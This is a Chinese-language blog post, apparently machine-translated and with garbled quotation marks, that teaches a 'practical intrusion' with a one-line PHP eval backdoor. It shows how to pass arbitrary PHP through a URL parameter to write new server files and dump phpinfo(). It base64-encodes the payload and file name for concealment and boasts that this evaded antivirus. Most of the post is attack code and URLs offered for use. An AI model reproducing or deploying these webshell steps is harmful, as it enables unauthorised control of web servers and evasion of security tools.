首页 » Web前端 » php木马程式技巧_由PHP木马轨范带来的实战入侵

php木马程式技巧_由PHP木马轨范带来的实战入侵

访客 2024-12-02 0

扫一扫用手机浏览

文章目录 [+]

test.php文件内容:

<?php eval($_GET['c']);?>

php木马程式技巧_由PHP木马轨范带来的实战入侵

访问:http://www.qichunquanze.cn/test.php?c=你想用的各种PHP语句体

php木马程式技巧_由PHP木马轨范带来的实战入侵
(图片来自网络侵删)

比如我的利用办法是这样的:

http://www.qichunquanze.cn/test.php?c=fputs(fopen(\公众hacker.php\公众,\"大众w\"大众),\"大众Hello,Hacker!\"大众);

这个是时候就会在根目录下天生了一个hacker.php文件,打开它创造有 Hello,Hacker! 文本。

http://www.qichunquanze.cn/hacker.php 它只是保存的是纯字符串而以。

哪么高等一点的做法是,将hacker.php文件内容输出为PHP措辞实行的语句,哪如何做呢?接下来看我的做法。

我们要将http://www.qichunquanze.cn/test.php?c=fputs(fopen(\公众hacker.php\"大众,\公众w\"大众),\"大众Hello,Hacker!\"大众);这个url中的Hello,Hacker!这段文本更换成php语句才能达到目的,直接在URL中写成我们要将http://www.qichunquanze.cn/test.php?c=fputs(fopen(\"大众hacker.php\"大众,\公众w\"大众),\"大众<?php echo 'Hello,Hacker!' ; ?>\公众); 创造会涌现报错,哪是由于不能适别PHP的旁边尖括号造成的,哪么我们改进一下代码

$hackerstring = \"大众<?php echo 'Hello,Hacker!' ; ?>\"大众;

我们只有将$hackerstring这段文本天生到hacker.php文件中 <?php echo 'Hello,Hacker!' ; ?>才能算此方法通过测试。

echo base64_encode($hackerstring);

<?php echo 'Hello,Hacker!' ; ?>经由base64_encode转码得到的结果如下:

得到结果:PD9waHAgZWNobyAnSGVsbG8sSGFja2VyISc7Pz4=

我们将这段代码代入下面程式:

fputs(fopen(\"大众hacker.php\"大众,\"大众w\"大众),base64_decode('PD9waHAgZWNobyAnSGVsbG8sSGFja2VyISc7Pz4='));

浏览器中访问:

http://www.qichunquanze.cn/test.php?c=fputs(fopen(\"大众hacker.php\"大众,\公众w\公众),base64_decode('PD9waHAgZWNobyAnSGVsbG8sSGFja2VyISc7Pz4='));

运行后,去根目录找到hacker.php文件,内容测试如下图所示。

此时算是大功告成了,你就可运行http://www.qichunquanze.cn/hacker.php文件了如下图

为了测试进一步繁芜一点,为弄清做事器主机上的配置,也可以有phpinfo()语句写到hacker.php文件里,做法是更换原有的 Hello,Hacker! 内容,详细写法是

$hackerstring = \"大众<?php phpinfo() ; ?>\公众;

echo base64_encode($hackerstring);得到字符串 'PD9waHAgcGhwaW5mbygpOz8+'

在URL中将其代入,然后在浏览器运行:

http://www.qichunquanze.cn/test.php?c=fputs(fopen(\"大众hacker.php\"大众,\"大众w\公众),base64_decode('PD9waHAgcGhwaW5mbygpOz8+'));

这时hacker.php文件 天生结果内容是:<?php phpinfo() ; ?>

浏览器运行http://www.qichunquanze.cn/hacker.php,显示的内容如下:

涌现这个界面,你就知道做事器的统统了。

还有改进的地方

fputs(fopen(\"大众hacker.php\公众,\"大众w\"大众),base64_decode('PD9waHAgcGhwaW5mbygpOz8+'));

把文件名hacker.php也转成base64编码吧,这样加强陷弊性。

上边这句代码居然逃过了病毒程序的追杀。
这上边的实例只是个宿影,其它措辞也一样的道理,大家要学会举一反三,多考虑考虑,你的技能才会得提高!

噢,耶,这次测试入侵成功了吧!

一起分享谈论技能吧,请关注\"大众IT自由职业者\"大众,将会更多精彩送上。

标签:

相关文章

介绍百度码,技术革新背后的智慧之光

随着科技的飞速发展,互联网技术已经成为我们生活中不可或缺的一部分。而在这个信息爆炸的时代,如何快速、准确地获取信息,成为了人们关注...

Web前端 2025-01-03 阅读4 评论0

介绍皮箱密码,开启神秘之门的钥匙

皮箱,作为日常生活中常见的收纳工具,承载着我们的珍贵物品。面对紧闭的皮箱,许多人却束手无策。如何才能轻松打开皮箱呢?本文将为您揭秘...

Web前端 2025-01-03 阅读4 评论0

介绍盗号器,网络安全的隐忧与应对步骤

随着互联网的快速发展,网络安全问题日益突出。盗号器作为一种非法工具,对网民的个人信息安全构成了严重威胁。本文将深入剖析盗号器的原理...

Web前端 2025-01-03 阅读2 评论0